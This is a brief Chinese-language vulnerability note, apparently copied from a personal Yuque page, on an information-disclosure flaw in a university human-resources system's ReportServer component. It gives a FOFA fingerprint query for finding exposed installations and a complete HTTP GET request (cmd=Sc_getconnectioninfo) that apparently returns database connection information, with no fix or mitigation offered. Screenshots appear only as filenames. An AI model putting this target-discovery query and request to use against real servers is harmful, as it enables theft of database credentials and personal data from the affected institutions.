登录 白背景
源码

高校人力资源管理系统ReportServer存在敏感信息泄露漏洞

一、漏洞简介

高校人力资源管理系统ReportServer存在敏感信息泄露漏洞

二、影响版本

  • 高校人力资源管理系统

三、资产测绘

  • fofabody="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"
  • 特征

1729414884399-6be61b88-4e82-42e2-bfb0-451f6e130f92.png

四、漏洞复现

GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*

1729415182606-37ca16b7-4b31-40ae-b37a-7350c1af4d59.png

原文: https://www.yuque.com/xiaokp7/ocvun2/rgvpmmb1y7v6vfdc